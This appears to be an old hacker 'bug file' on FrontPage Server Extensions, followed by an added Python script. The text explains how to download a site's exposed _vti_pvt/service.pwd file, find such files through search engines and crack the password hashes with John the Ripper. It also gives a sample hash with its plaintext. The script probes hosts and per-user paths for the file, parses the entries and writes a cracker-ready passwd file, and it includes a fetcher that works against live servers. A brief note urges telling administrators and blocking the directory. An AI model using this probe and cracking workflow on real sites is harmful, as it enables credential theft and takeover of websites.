============================================
FRONTPAGE EXTENSIONS
============================================
Author : Netw0rk Bug
E-Mail : bug@netw0rk.freeserve.co.uk
Date   : MAY 1999
============================================

If a system is running FrontPage Server Extensions, you can try to pull its
service.pwd password file straight off the web server:

  http://www.site.here.com/_vti_pvt/service.pwd

Most of the time this returns a small password file, around four lines long. The
passwords in it are not stored in clear but as crypt(3) hashes, so they have to
be cracked rather than "decrypted". A password cracker does this; John the
Ripper (covered below) is the right tool for crypt(3) hashes, while L0phtCrack
(available from www.l0pht.com) does the same job but is built for Windows LM/NT
hashes, so it will not take this file.

If service.pwd is not there, request the /_vti_pvt/ directory itself: where
directory listing is enabled, the server lists its contents straight off. Check
what actually comes back, though. A 200 response carrying an HTML "not found"
page is not a hit; a real service.pwd is plain text, one user:hash pair per line.

Individual users may also have FrontPage extensions installed in their own web
space, so try URLs like:

  http://www.site.here.com/~mike/_vti_pvt/service.pwd

We're sure you get the idea: a simple yet effective exploit.

Other ways of obtaining service.pwd:

  http://ftpsearch.com/index.html
    search for service.pwd

  http://www.altavista.digital.com
    advanced search for link:"/_vti_pvt/service.pwd"

If service.pwd is obtained it will look similar to this:

  Dave:J7U7OJ9zkEKNC

The above password is apple.

The hash is already in crypt(3) DES form; what John the Ripper wants is a
passwd-style line around it, so turn the entry into standard /etc/passwd
format. The uid, gid, home and shell fields are placeholders, John only looks
at the user name and the hash:

  Dave:J7U7OJ9zkEKNC:10:200:Dave:/users/dave:/bin/bash

Then all you need to do is run a cracker like John the Ripper against that
file. I covered how to use it in a previous bug file.

With a cracked user name and password you could then load up FrontPage and
connect to the web site as that author. However... we are not going to do this,
are we? We are going to tell the website admin about the lack of security.
Access to the _vti_pvt directory should be denied at the web server; a
service.pwd that is readable over HTTP means that restriction is missing.
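The probe, the soft-404 check and the passwd conversion described above, as an added example (not code from the original bug file). The host name, the sample service.pwd contents and the fake fetcher are constructed for the demonstration; the uid/gid/home/shell defaults follow the layout used in the text, and check_host accepts any fetcher so the file runs offline while http_fetch gives a real one for use against a host you are allowed to test.

```python
"""FrontPage service.pwd probe, parser and passwd converter (added example)."""
import re

# A crypt(3) DES hash is exactly 13 characters from [./0-9A-Za-z]:
# 2 salt characters followed by 11 hash characters.
_DES_HASH = re.compile(r"^[./0-9A-Za-z]{13}$")
# One service.pwd entry: user, colon, hash, nothing else on the line.
_ENTRY = re.compile(r"^([^:\s]+):(\S+)$")

VTI_PVT = "/_vti_pvt/"
SERVICE_PWD = VTI_PVT + "service.pwd"

# Constructed sample; the '#' line stands in for the comment header real files carry.
SAMPLE_SERVICE_PWD = "# -FrontPage-\nDave:J7U7OJ9zkEKNC\nmike:ab1Cd2Ef3Gh4I\n"


def candidate_urls(base, users=()):
    """URLs worth requesting on one host, in the order the text suggests: the
    site-wide service.pwd, the _vti_pvt directory itself (directory listing
    may be on), then each ~user copy."""
    base = base.rstrip("/")
    urls = [base + SERVICE_PWD, base + VTI_PVT]
    urls += [f"{base}/~{u}{SERVICE_PWD}" for u in users]
    return urls


def parse_service_pwd(text):
    """Return (user, hash) pairs, ignoring blank lines and '#' comments."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = _ENTRY.match(line)
        if m:
            entries.append((m.group(1), m.group(2)))
    return entries


def looks_like_service_pwd(body):
    """Tell a real service.pwd from a 200 'not found' HTML page: no markup,
    and every non-comment line is a user:hash pair."""
    low = body.lower()
    if "<html" in low or "<!doctype" in low:
        return False
    lines = [l.strip() for l in body.splitlines()]
    entries = [l for l in lines if l and not l.startswith("#")]
    return bool(entries) and all(_ENTRY.match(l) for l in entries)


def is_des_crypt(pwhash):
    """True if the hash has the classic 13-character crypt(3) DES shape."""
    return bool(_DES_HASH.match(pwhash))


def to_passwd_line(user, pwhash, uid=10, gid=200, home_root="/users", shell="/bin/bash"):
    """Build the passwd-style line John the Ripper reads; uid/gid/home/shell
    are placeholders, only user and hash matter to the cracker."""
    return f"{user}:{pwhash}:{uid}:{gid}:{user}:{home_root}/{user.lower()}:{shell}"


def to_passwd_file(text, start_uid=10):
    """Convert a whole service.pwd into passwd format, one unique uid per user."""
    lines = [to_passwd_line(u, h, uid=start_uid + i)
             for i, (u, h) in enumerate(parse_service_pwd(text))]
    return ("\n".join(lines) + "\n") if lines else ""


def http_fetch(url, timeout=10):
    """Real fetcher: fetch(url) -> (status, body). Not used by the offline demo."""
    import urllib.error
    import urllib.request
    try:
        with urllib.request.urlopen(url, timeout=timeout) as r:
            return r.status, r.read().decode("latin-1", "replace")
    except urllib.error.HTTPError as e:
        return e.code, ""


def check_host(base, fetch, users=()):
    """Probe one host. fetch(url) must return (status, body). Returns a dict per
    hit: a served service.pwd (with parsed entries) or a directory listing
    that exposes one."""
    findings = []
    for url in candidate_urls(base, users):
        status, body = fetch(url)
        if status != 200:
            continue
        if url.endswith("service.pwd") and looks_like_service_pwd(body):
            entries = [(u, h, is_des_crypt(h)) for u, h in parse_service_pwd(body)]
            findings.append({"url": url, "listing": False, "entries": entries})
        elif url.endswith(VTI_PVT) and "service.pwd" in body:
            findings.append({"url": url, "listing": True, "entries": []})
    return findings


def fake_fetch(url):
    """Constructed stand-in for an HTTP GET: only the site-wide file exists,
    the directory gives an HTML soft 404, ~mike has nothing."""
    if url == "http://www.site.here.com/_vti_pvt/service.pwd":
        return 200, SAMPLE_SERVICE_PWD
    if url.endswith(VTI_PVT):
        return 200, "<html><body>Not found</body></html>"
    return 404, ""


def demo():
    """Run the probe against the constructed host."""
    return check_host("http://www.site.here.com", fake_fetch, users=["mike"])


if __name__ == "__main__":
    for hit in demo():
        print(hit["url"], "listing" if hit["listing"] else hit["entries"])
    print(to_passwd_file(SAMPLE_SERVICE_PWD), end="")
```

The soft-404 test matters in practice: many servers answer every unknown path with 200 and an HTML page, which a naive "got a 200" probe would report as a password file. Feed the output of to_passwd_file straight to John the Ripper.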